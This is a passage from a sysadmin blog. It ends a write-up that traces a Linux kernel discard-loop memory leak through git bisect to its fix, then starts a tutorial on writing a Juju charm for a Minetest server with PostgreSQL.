<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect good
Bisecting: 696 revisions left to test after this (roughly 10 steps)
[621db8f68ea5dc1389cc29de188c62b708520115] vhost/scsi: truncate T10 PI iov_iter to prot_bytes
</code></pre></div></div>
<p>It gives us a new commit to test. This is halfway between the commit we just
marked good and 4.15.0-56, or on a bigger scale, three quarters of the
way between 4.15.0-55 and 4.15.0-56. Nice. Again, build a test kernel, upload it
to a new cloud instance and try to reproduce. This time, I managed to see the OOM
problem, and the system crashed.</p>
<p>So I tell git that.</p>
<p>This keeps going until we home in on the commit which causes the problem:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect bad
Bisecting: 348 revisions left to test after this (roughly 9 steps)
[caed9931cfca4728ede493925804551759a17412] cdc-acm: fix race between reset and control messaging
$ git bisect good
Bisecting: 174 revisions left to test after this (roughly 8 steps)
[309d43a67a3a24ebf5ef72f3dcdc00dfcdd8c3fb] KVM: arm64: Fix caching of host MDCR_EL2 value
$ git bisect good
Bisecting: 87 revisions left to test after this (roughly 7 steps)
[d06521337ebd71f654b606612714c48e34aacd35] bcache: Populate writeback_rate_minimum attribute
$ git bisect bad
Bisecting: 43 revisions left to test after this (roughly 6 steps)
[97f76c511e9a41bc19282a921e53545ce08e168c] btrfs: Ensure btrfs_trim_fs can trim the whole filesystem
$ git bisect good
Bisecting: 21 revisions left to test after this (roughly 5 steps)
[edf57bb077f89c6e95003bdacc9478f52a37fd46] MD: fix invalid stored role for a disk - try2
$ git bisect good
Bisecting: 10 revisions left to test after this (roughly 4 steps)
[b6b0136869f05706228bb13511db7798af2c232b] mailbox: PCC: handle parse error
$ git bisect bad
Bisecting: 5 revisions left to test after this (roughly 3 steps)
[b515257f186e532e0668f7deabcb04b5d27505cf] block: make sure discard bio is aligned with logical block size
$ git bisect bad
Bisecting: 2 revisions left to test after this (roughly 1 step)
[da64877868c5ea90f741a31261205dae67139f59] mtd: spi-nor: fsl-quadspi: Don't let -EINVAL on the bus
$ git bisect good
Bisecting: 0 revisions left to test after this (roughly 1 step)
[3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34] block: don't deal with discard limit in blkdev_issue_discard()
$ git bisect bad
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[894c8a9ad1d7e551bfbce5422c68816bc69146a2] bcache: correct dirty data statistics
$ git bisect good
3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34 is the first bad commit
commit 3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Oct 12 15:53:10 2018 +0800
block: don't deal with discard limit in blkdev_issue_discard()
BugLink: https://bugs.launchpad.net/bugs/1836802
commit 744889b7cbb56a64f957e65ade7cb65fe3f35714 upstream.
blk_queue_split() does respect this limit via bio splitting, so no
need to do that in blkdev_issue_discard(), then we can align to
normal bio submit(bio_add_page() & submit_bio()).
More importantly, this patch fixes one issue introduced in a22c4d7e34402cc
("block: re-add discard_granularity and alignment checks"), in which
zero discard bio may be generated in case of zero alignment.
Fixes: a22c4d7e34402ccdf3 ("block: re-add discard_granularity and alignment checks")
:040000 040000 7483c1408acdee78933db770716b9b18f16d7644 b59d8fa70f2b07fb0a08b42aaab78daa8af57501 M block
</code></pre></div></div>
<h1 id="root-cause-analysis">Root Cause Analysis</h1>
<p>The problem is caused by the two commits below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit: 744889b7cbb56a64f957e65ade7cb65fe3f35714
ubuntu-bionic: 3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Oct 12 15:53:10 2018 +0800
Subject: block: don't deal with discard limit in blkdev_issue_discard()
BugLink: https://bugs.launchpad.net/bugs/1836802
commit: 1adfc5e4136f5967d591c399aff95b3b035f16b7
ubuntu-bionic: b515257f186e532e0668f7deabcb04b5d27505cf
Author: Ming Lei <ming.lei@redhat.com>
Date: Mon Oct 29 20:57:17 2018 +0800
Subject: block: make sure discard bio is aligned with logical block size
BugLink: https://bugs.launchpad.net/bugs/1836802
</code></pre></div></div>
<p>You can read them by looking at the text files below:</p>
<ul>
<li><a href="/assets/bin/block_dont_deal_with.txt">block: don’t deal with discard limit in blkdev_issue_discard()</a></li>
<li><a href="/assets/bin/block_make_sure_discard.txt">block: make sure discard bio is aligned with logical block size</a></li>
</ul>
<p>Now, the fault was triggered in two stages. Firstly, in “block: don’t deal with
discard limit in blkdev_issue_discard()” a while loop was changed such that
there is a possibility of an infinite loop if <code class="language-plaintext highlighter-rouge">__blkdev_issue_discard()</code> is called
with <code class="language-plaintext highlighter-rouge">nr_sects</code> > 0 and <code class="language-plaintext highlighter-rouge">req_sects</code> somehow becomes 0:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">__blkdev_issue_discard</span><span class="p">(...,</span> <span class="n">sector_t</span> <span class="n">nr_sects</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">while</span> <span class="p">(</span><span class="n">nr_sects</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">req_sects</span> <span class="o">=</span> <span class="n">nr_sects</span><span class="p">;</span>
<span class="n">sector_t</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="n">end_sect</span> <span class="o">=</span> <span class="n">sector</span> <span class="o">+</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">nr_sects</span> <span class="o">-=</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="n">sector</span> <span class="o">=</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If <code class="language-plaintext highlighter-rouge">req_sects</code> is 0, then <code class="language-plaintext highlighter-rouge">end_sect</code> is always equal to <code class="language-plaintext highlighter-rouge">sector</code>, and, most
importantly, <code class="language-plaintext highlighter-rouge">nr_sects</code> is only decremented in one place, by <code class="language-plaintext highlighter-rouge">req_sects</code>,
which, if 0, leads to the infinite loop condition.</p>
<p>Now, since <code class="language-plaintext highlighter-rouge">req_sects</code> is initially equal to <code class="language-plaintext highlighter-rouge">nr_sects</code>, the loop would never be
entered in the first place if <code class="language-plaintext highlighter-rouge">nr_sects</code> is 0.</p>
<p>This is where the second commit, “block: make sure discard bio is aligned with
logical block size” comes in.</p>
<p>This commit adds a line to the above loop, to allow <code class="language-plaintext highlighter-rouge">req_sects</code> to be set to a
new value:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">__blkdev_issue_discard</span><span class="p">(...,</span> <span class="n">sector_t</span> <span class="n">nr_sects</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">while</span> <span class="p">(</span><span class="n">nr_sects</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">req_sects</span> <span class="o">=</span> <span class="n">nr_sects</span><span class="p">;</span>
<span class="n">sector_t</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="n">req_sects</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">req_sects</span><span class="p">,</span> <span class="n">bio_allowed_max_sectors</span><span class="p">(</span><span class="n">q</span><span class="p">));</span>
<span class="n">end_sect</span> <span class="o">=</span> <span class="n">sector</span> <span class="o">+</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">nr_sects</span> <span class="o">-=</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="n">sector</span> <span class="o">=</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We see that <code class="language-plaintext highlighter-rouge">req_sects</code> will now be the minimum of itself and
<code class="language-plaintext highlighter-rouge">bio_allowed_max_sectors(q)</code>, a new function introduced by the same commit.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">bio_allowed_max_sectors</span><span class="p">(</span><span class="k">struct</span> <span class="n">request_queue</span> <span class="o">*</span><span class="n">q</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">round_down</span><span class="p">(</span><span class="n">UINT_MAX</span><span class="p">,</span> <span class="n">queue_logical_block_size</span><span class="p">(</span><span class="n">q</span><span class="p">))</span> <span class="o">>></span> <span class="mi">9</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">queue_logical_block_size(q)</code> looks up the logical block size of the underlying
device from the request queue limits.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">queue_logical_block_size</span><span class="p">(</span><span class="k">struct</span> <span class="n">request_queue</span> <span class="o">*</span><span class="n">q</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">retval</span> <span class="o">=</span> <span class="mi">512</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">q</span> <span class="o">&&</span> <span class="n">q</span><span class="o">-></span><span class="n">limits</span><span class="p">.</span><span class="n">logical_block_size</span><span class="p">)</span>
<span class="n">retval</span> <span class="o">=</span> <span class="n">q</span><span class="o">-></span><span class="n">limits</span><span class="p">.</span><span class="n">logical_block_size</span><span class="p">;</span>
<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
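<p>As a quick sanity check, you can ask a running system what logical block size the
kernel reports for a disk. A small sketch, assuming your disk is <code class="language-plaintext highlighter-rouge">sda</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cat /sys/block/sda/queue/logical_block_size
512
$ sudo blockdev --getss /dev/sda
512
</code></pre></div></div>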
<p>Here is the catch: if <code class="language-plaintext highlighter-rouge">queue_logical_block_size(q)</code> ever hands back a bogus
logical block size of 0, which the device reload race described below can
produce despite the 512 byte fallback, then <code class="language-plaintext highlighter-rouge">round_down(UINT_MAX, 0)</code> evaluates
to 0, and 0 shifted right by 9 is still 0. (With a sane 512 byte block size the
expression yields a large, harmless cap of 8388607 sectors.)</p>
<p><code class="language-plaintext highlighter-rouge">bio_allowed_max_sectors()</code> will return 0, and the min with <code class="language-plaintext highlighter-rouge">req_sects == nr_sects</code>
will favour the new 0.</p>
<p>This causes <code class="language-plaintext highlighter-rouge">nr_sects</code> to never be decremented, since <code class="language-plaintext highlighter-rouge">req_sects</code> is 0, and
<code class="language-plaintext highlighter-rouge">req_sects</code> itself never changes, since the <code class="language-plaintext highlighter-rouge">min()</code> it is fed back through will
always favour the 0.</p>
<p>From there the infinite loop iterates and fills up the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab with
newly created bio entries, until all memory is exhausted and the OOM reaper
comes out and starts killing processes, which is ineffective since this is a
kernel memory leak.</p>
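<p>If you want to watch a leak like this happen in real time, the slab caches are
visible from userspace. A quick way to keep an eye on <code class="language-plaintext highlighter-rouge">kmalloc-256</code> while a
reproducer runs:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># The active object count climbs without bound while the loop runs
$ watch 'sudo grep kmalloc-256 /proc/slabinfo'
# Or take a one-shot, size-sorted view of the largest slab caches
$ sudo slabtop -o -s c | head -n 15
</code></pre></div></div>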
<h1 id="finding-the-commit-with-the-fix">Finding the Commit With the Fix</h1>
<p>The fix comes in the form of:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit: b88aef36b87c9787a4db724923ec4f57dfd513f3
ubuntu-bionic: a55264933f12c2fdc28a66841c4724021e8c1caf
Author: Mikulas Patocka <mpatocka@redhat.com>
Date: Tue Jul 3 13:34:22 2018 -0400
Subject: block: fix infinite loop if the device loses discard capability
BugLink: https://bugs.launchpad.net/bugs/1837257
</code></pre></div></div>
<p>You can read it here:</p>
<ul>
<li><a href="/assets/bin/block_fix_infinite_loop.txt">block: fix infinite loop if the device loses discard capability</a></li>
</ul>
<p>This adds a check right after the <code class="language-plaintext highlighter-rouge">min(req_sects, bio_allowed_max_sectors(q));</code>
call to test if <code class="language-plaintext highlighter-rouge">req_sects</code> has been set to 0, and if it has, to exit the loop and
move into failure handling:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">req_sects</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">req_sects</span><span class="p">,</span> <span class="n">bio_allowed_max_sectors</span><span class="p">(</span><span class="n">q</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">req_sects</span><span class="p">)</span>
<span class="k">goto</span> <span class="n">fail</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>From there things work as normal. As “block: fix infinite loop if the device
loses discard capability” points out, all of this is triggered by a race: if the
underlying device is reloaded with a metadata table that doesn’t support the
discard operation, <code class="language-plaintext highlighter-rouge">q->limits.max_discard_sectors</code> is set to 0, which has the
knock-on effect of leaving <code class="language-plaintext highlighter-rouge">q->limits.logical_block_size</code> with strange values,
leading to the infinite loop and out of memory condition.</p>
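<p>To make the race a little more concrete, here is a rough sketch of how a
device-mapper device can lose its discard capability mid-operation. This is an
illustration only, not the exact reproducer from the commit: it assumes a
scratch disk at <code class="language-plaintext highlighter-rouge">/dev/sdb</code>, and the table reload has to land while the discard
is still in flight for the race to trigger:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Create a 100MiB dm-linear device backed by the scratch disk
$ sudo dmsetup create scratch --table '0 204800 linear /dev/sdb 0'

# Kick off a large discard against it in the background
$ sudo blkdiscard /dev/mapper/scratch &

# While the discard is running, swap in a table that does not
# support discard, zeroing the queue's discard limits
$ sudo dmsetup reload scratch --table '0 204800 error'
$ sudo dmsetup resume scratch
</code></pre></div></div>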
<h1 id="landing-the-fix-in-the-kernel">Landing the Fix in the Kernel</h1>
<p>As with all kernel bugs, we need to follow the <a href="https://wiki.ubuntu.com/StableReleaseUpdates">Stable Release
Updates</a> procedure, and follow the
special <a href="https://wiki.ubuntu.com/KernelTeam/KernelUpdates">kernel specific rules</a>.</p>
<p>This involves opening a launchpad bug and filling out a SRU template:</p>
<ul>
<li><a href="https://bugs.launchpad.net/bugs/1842271">https://bugs.launchpad.net/bugs/1842271</a></li>
</ul>
<p>For this particular SRU I got lucky, since “block: fix infinite loop if the
device loses discard capability” had already been pulled in from an upstream
-stable release and applied to master-next via:</p>
<ul>
<li><a href="https://bugs.launchpad.net/bugs/1837257">https://bugs.launchpad.net/bugs/1837257</a></li>
</ul>
<p>So I did not need to submit any patches to the Ubuntu kernel mailing list. Poor
me haha. Don’t worry, there’s always next time.</p>
<p>The commit made its way into 4.15.0-59-generic and was eventually released as
4.15.0-60-generic. If you are using this kernel or newer, you will be running
a fixed kernel and you will not see this issue.</p>
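<p>A quick way to check where you stand:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ uname -r
4.15.0-60-generic
</code></pre></div></div>
<p>Anything reporting 4.15.0-60 or later contains the fix.</p>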
<h1 id="conclusion">Conclusion</h1>
<p>There you have it. We reproduced and determined the root cause of a runaway
kernel memory allocation that consumed the entire system memory, and made sure
it got fixed in the next kernel update.</p>
<p>This case was an excellent example of when to use <code class="language-plaintext highlighter-rouge">git bisect</code>, since we had
everything required for it to be an effective tool for this situation.</p>
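<p>For those who haven’t driven it before, the workflow is short. A sketch of a
typical session (the good and bad revisions here are placeholders for whatever
your reproducer tells you):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect start
$ git bisect bad HEAD                   # a kernel that reproduces the leak
$ git bisect good Ubuntu-4.15.0-50.54   # placeholder: last known good tag
# build and boot the suggested commit, run the reproducer, then mark it:
$ git bisect good    # or 'git bisect bad', as appropriate
# repeat until git names the first bad commit, then clean up:
$ git bisect reset
</code></pre></div></div>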
<p>We closely analysed the code, determined exactly what caused the infinite loop
to occur, and saw how the fix holds up. I’m pretty happy with how this got
resolved, even if <code class="language-plaintext highlighter-rouge">git bisect</code> is a little bland compared to other more
exotic bug finding tools.</p>
<p>I hope you enjoyed the read, and as always, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellAs mentioned previously, I will write about particularly interesting cases I have worked from start to completion from time to time on this blog. This is another of those cases. Today, we are going to look at a case where creating a seemingly innocent RAID array triggers a kernel bug which causes the system to allocate all of its memory and subsequently crash. Let’s start digging into this and get this fixed.Learning How to Write Juju Charms by Creating a Minetest Charm2019-12-02T00:00:00+00:002019-12-02T00:00:00+00:00https://ruffell.nz/programming/writeups/2019/12/02/learning-how-to-write-juju-charms-by-creating-a-minetest-charm<p>In my <a href="https://ruffell.nz/programming/writeups/2019/08/26/getting-started-with-juju-to-deploy-and-scale-software.html">previous blog post about Juju</a>,
a tool which lets you deploy and scale software easily, we learned what Juju
is, how to deploy some common software packages, debug them, and scale them.</p>
<p>Juju deploys <em>Charms</em>, a set of instructions on how to install, configure and
scale a particular software package. To be able to deploy software as a Charm,
a Charm has to be written first. Usually Charms are written by experts in
operating that software package, so that the Charm represents the best way to
configure and tune that application. But what happens if no Charm exists for
something you want to deploy?</p>
<p><img src="/assets/images/2019_268.png" alt="hero" /></p>
<p>Today we are going to learn how to write our own Charms using the original Charm
writing method, by making a Charm for the <a href="https://www.minetest.net/">Minetest</a>
game server. So fire up your favourite text editor, and let’s get started.</p>
<!--more-->
<h1 id="what-do-we-want-to-deploy">What Do We Want to Deploy?</h1>
<p>Before we start writing our Charm, we need to collect a list of requirements and
things we want to build into our Charm.</p>
<p>We are going to deploy a server for <a href="https://www.minetest.net/">Minetest</a>,
an open source voxel game engine which supports different sub-games.
Minetest is pretty much the open source alternative to Minecraft.</p>
<p><img src="/assets/images/2019_269.png" alt="minetest" /></p>
<p>Minetest is written mostly in C++ and Lua, so it has excellent performance, and
the game is designed to be modded. There are also a ton of configuration options
that can be tweaked, so we can build those things into our Charm.</p>
<p>To make things a little more interesting than a basic single application Charm,
I see that Minetest supports <a href="https://wiki.minetest.net/Database_backends#PostgreSQL">PostgreSQL as a database backend</a>.</p>
<p>PostgreSQL in Minetest offers performance improvements over using the default
SQLite3 DB, as well as offering the ability to store multiple Minetest “worlds”
in the same PostgreSQL database instance.</p>
<p>So our requirements for our Minetest Charm will be:</p>
<ul>
<li>To deploy minetest-server.</li>
<li>To be able to edit and set minetest-server configuration variables.</li>
<li>To use PostgreSQL as a database backend.</li>
</ul>
<p>Let’s get started.</p>
<h1 id="original-charms-vs-reactive-charms">Original Charms Vs Reactive Charms</h1>
<p>There are several methods to write Charms, and each method has evolved over time
with different major versions of Juju.</p>
<p>The original method of writing Charms was introduced in Juju 1.0, and while
simple, they had the downside of not knowing anything about a deployment’s
state. Reactive Charms solve this problem by storing and managing state, but
this required a fundamental change in how Charms are written.</p>
<p>There are a lot of Charms out there, some use the older original method, and
others have been upgraded or written in the reactive method. Since both methods
are still widespread, and it is likely that Charms written in both methods will
need to be maintained into the future, I will eventually cover both methods.
For now, we will tackle learning the original method in this blog post.</p>
<h1 id="original-charm-writing-method">Original Charm Writing Method</h1>
<p>I’m more or less going to be following along on the <a href="https://discourse.jujucharms.com/t/writing-your-first-juju-charm/1046">Juju documentation</a>
for the first generation charms.</p>
<h2 id="create-charm-directory-structure">Create Charm Directory Structure</h2>
<p>Charms are more or less a collection of text files, which makes writing and
modifying them very straightforward.</p>
<p>We will start by making a directory for our charms to live in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd ~
$ mkdir charms
$ cd charms
</code></pre></div></div>
<p>From there, a Charm is the collection of text files inside a directory, so we
will make the directory structure we need:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir minetest-server
$ cd minetest-server
$ touch README metadata.yaml config.yaml copyright icon.svg revision
$ mkdir hooks
$ cd hooks
$ touch start stop install db-relation-changed config-changed
</code></pre></div></div>
<p>Your directory structure should now look like this:</p>
<p><img src="/assets/images/2019_271.png" alt="directory" /></p>
<h2 id="edit-the-readme-file">Edit the README File</h2>
<p>All Charms need a README file, where we document what the Charm does, how to
deploy it, and what its configuration options are.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Minetest is a fun, free and open source voxel game inspired by Minecraft.
It supports various game modes, like survival and creative, and many more can
be added with mods.
This Charm deploys a basic game server, and is backed by a PostgreSQL database
for maximum performance. There are no mods, so you will need to add them
yourself.
To deploy:
$ juju bootstrap
$ juju deploy postgresql
$ juju deploy minetest-server
$ juju expose minetest-server
</code></pre></div></div>
<h2 id="edit-the-revision-file">Edit the revision File</h2>
<p>The revision file keeps track of the Charm version. We are going to keep this
simple, by saying that this is the first version:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1
</code></pre></div></div>
<h2 id="create-the-metadatayaml-file">Create the metadata.yaml File</h2>
<p>The <code class="language-plaintext highlighter-rouge">metadata.yaml</code> file tells Juju what this Charm is for, and what relations
this Charm is capable of. It also contains important information such as the
description, maintainer and so on.</p>
<p>The first part is straightforward:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name: minetest-server
summary: Minetest is an opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
Minetest is a fun, opensource voxel game engine that can be customised with
different game modes and mods.
This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- eoan
- bionic
</code></pre></div></div>
<p>The next part involves describing the relations which this Charm provides. We
need to list the relation type (provides, requires or peers), the name of the
relation, and the interface type.</p>
<p>We have two relations. We provide one, Minetest, and require one,
PostgreSQL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>provides:
server:
interface: minetest
requires:
db:
interface: pgsql
</code></pre></div></div>
<p>We don’t need a peers section: Minetest is not designed for clustering, and
all players must connect to the same server instance, so unfortunately it
cannot scale horizontally.</p>
<p>Putting it all together, we have a fully made <code class="language-plaintext highlighter-rouge">metadata.yaml</code> file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name: minetest-server
summary: Minetest is an opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
Minetest is a fun, opensource voxel game engine that can be customised with
different game modes and mods.
This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- eoan
- bionic
provides:
server:
interface: minetest
requires:
db:
interface: pgsql
</code></pre></div></div>
<h2 id="describe-configuration-options-in-configyaml">Describe Configuration Options in config.yaml</h2>
<p>Since we want users of our Charm to be able to configure the Minetest server
to suit their needs, such as changing the server message of the day, or the port
it is being served on, we need to define configuration variables in <code class="language-plaintext highlighter-rouge">config.yaml</code>.</p>
<p>This is also pretty straightforward.</p>
<p>The only thing to note is that you should carefully consider which options you
want to expose to your users. Users don’t really care about the fine details,
so only expose what most people will understand and use.</p>
<p>That said, make sure you set sensible defaults: all Charms should work out of
the box on first deployment. If people want to change the config, they will;
otherwise they will leave everything alone.</p>
<p>Here is an example config, inspired by the existing config.yaml in <a href="https://api.jujucharms.com/charmstore/v5/~jamestait/precise/minetest-server-2/archive/config.yaml">James Tait’s
older minetest charm</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>options:
port:
default: 30000
description: Server port to listen on
type: int
server-name:
default: "Minetest server"
description: Name of the server
type: string
server-description:
default: "Juju deployed Minetest server"
description: Description of server
type: string
motd:
default: "Welcome!"
description: Message of the day
type: string
strict-protocol-version-checking:
default: "false"
description: Set to true to disallow old clients from connecting
type: string
creative-mode:
default: "false"
description: Set to true to enable creative mode (unlimited inventory)
type: string
enable-damage:
default: "false"
description: Enable players getting damage and dying
type: string
default-password:
default: ""
description: New users need to input this password
type: string
default-privs:
default: "build,shout"
description: |
Available privileges: build, shout, teleport, settime, privs, ban
See /privs in game for a full list on your server and mod configuration
type: string
enable-pvp:
default: "true"
description: Whether to enable players killing each other
type: string
</code></pre></div></div>
<h2 id="set-the-copyright-of-the-charm">Set the Copyright of the Charm</h2>
<p>All Charms should include a copyright file, which includes details about the
copyright and licensing status of the files inside the Charm.</p>
<p>Initially I was unsure what to place in the file, so I asked around my team.
The answer I got was that the Charm archive format does not specify a specific
way to license an application, so most Charms follow the <a href="https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/">debian/copyright
file format</a>.</p>
<p>We will take the <a href="https://github.com/openstack/charm-interface-keystone/blob/master/copyright">OpenStack Keystone Charm copyright</a>
file as inspiration, so the below will do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0
Files: *
Copyright: 2019, Matthew Ruffell.
License: GPL-3
License: GPL-3
This package is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this package; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
.
On Debian systems, the complete text of the GNU General
Public License can be found in `/usr/share/common-licenses/GPL-3'.
</code></pre></div></div>
<h2 id="make-an-icon-for-the-charm-store">Make an Icon for the Charm Store</h2>
<p>If you want your Charm to look nice on the Charm store listing or on the Juju
GUI, then you should probably set an icon.</p>
<p>We can use the Charms tools package to generate us a basic icon which we can
then customise.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo snap install charm --classic
$ cd ~/charms/minetest-server
$ charm add icon
</code></pre></div></div>
<p>From there, open up <code class="language-plaintext highlighter-rouge">icon.svg</code> in Inkscape or whatever vector editor you like,
and make a nice icon:</p>
<p><img src="/assets/images/2019_276.png" alt="icon" /></p>
<p>I used the icon found at <code class="language-plaintext highlighter-rouge">/usr/share/icons/hicolor/scalable/apps/minetest.svg</code>
to make this icon.</p>
<h2 id="write-hooks">Write Hooks</h2>
<p>Hooks are executable files which perform the actual work of installing and
maintaining the Charm. Hooks are called by Juju at specific times when each hook
is required. For example, the “install” hook is called when the Charm is being
deployed, and it is responsible for installing the software to the machine.</p>
<p>Let’s implement some hooks.</p>
<h3 id="start-hook">‘start’ Hook</h3>
<p>We will begin with the “start” hook. We are going to make our Minetest server a
systemd service, so all this needs to do is start the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
status=$(status-get)
if [ $status = "active" ]
then
juju-log "Starting Minetest Server"
systemctl restart minetest
fi
if [ $status != "active" ]
then
juju-log "Minetest is not ready to start. Charm is not in active state."
fi
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">set -e</code> command makes the shell abort the script as soon as any command
returns a non-zero exit code, indicating failure. The hook then exits with an
error, which Juju reports to its operator.</p>
<p>We use <code class="language-plaintext highlighter-rouge">systemctl restart</code> over <code class="language-plaintext highlighter-rouge">systemctl start</code> because we want our hooks to be
“idempotent”, meaning the operation can be repeated many times without
changing the intended result. If we try to start an already running service,
we might error out and cause problems. Restart will stop the service and bring
it back up again, picking up any configuration changes along the way.</p>
<h3 id="stop-hook">‘stop’ Hook</h3>
<p>The “stop” hook is similar to “start”, and just needs to stop the service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
juju-log "Stopping Minetest Server"
systemctl stop minetest
</code></pre></div></div>
<h3 id="install-hook">‘install’ Hook</h3>
<p>The “install” hook needs to install Minetest, and also install the systemd
service files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
juju-log "Installing Minetest from repos"
apt-get -y -qq install minetest
if ! getent group minetest > /dev/null ; then
juju-log "Adding minetest group"
addgroup --system minetest > /dev/null
fi
if ! getent passwd minetest > /dev/null ; then
juju-log "Adding minetest user"
adduser --system --home /home/minetest --ingroup minetest --gecos "Minetest server" minetest > /dev/null
fi
juju-log "Setting up configuration file"
mkdir -p /home/minetest/.minetest/worlds/world
cat > /home/minetest/.minetest/worlds/world/world.mt << EOF
port = 30000
server_name = Minetest server
server_description = Juju deployed Minetest server
motd = Welcome!
strict_protocol_version_checking = false
creative_mode = false
enable_damage = false
default_password =
default_privs = build,shout
enable_pvp = true
gameid = minetest
EOF
chown -R minetest:minetest /home/minetest/.minetest/
juju-log "Installing Minetest systemd service"
cat > /etc/systemd/system/minetest.service << EOF
[Unit]
Description=Minetest
Documentation=https://wiki.minetest.net/Main_Page
[Service]
Type=simple
User=minetest
ExecStart=/usr/games/minetest --server
ExecStop=/bin/kill -2 \$MAINPID
[Install]
WantedBy=multi-user.target
EOF
juju-log "Enabling Minetest service"
systemctl enable minetest
status-set blocked "Waiting for database connection"
</code></pre></div></div>
<p>Notice the use of <code class="language-plaintext highlighter-rouge">status-set blocked</code>? We did that to tell Juju that we need
extra things in order to continue. In this case, we need a database, and for the
<code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook to be executed before we can keep going.</p>
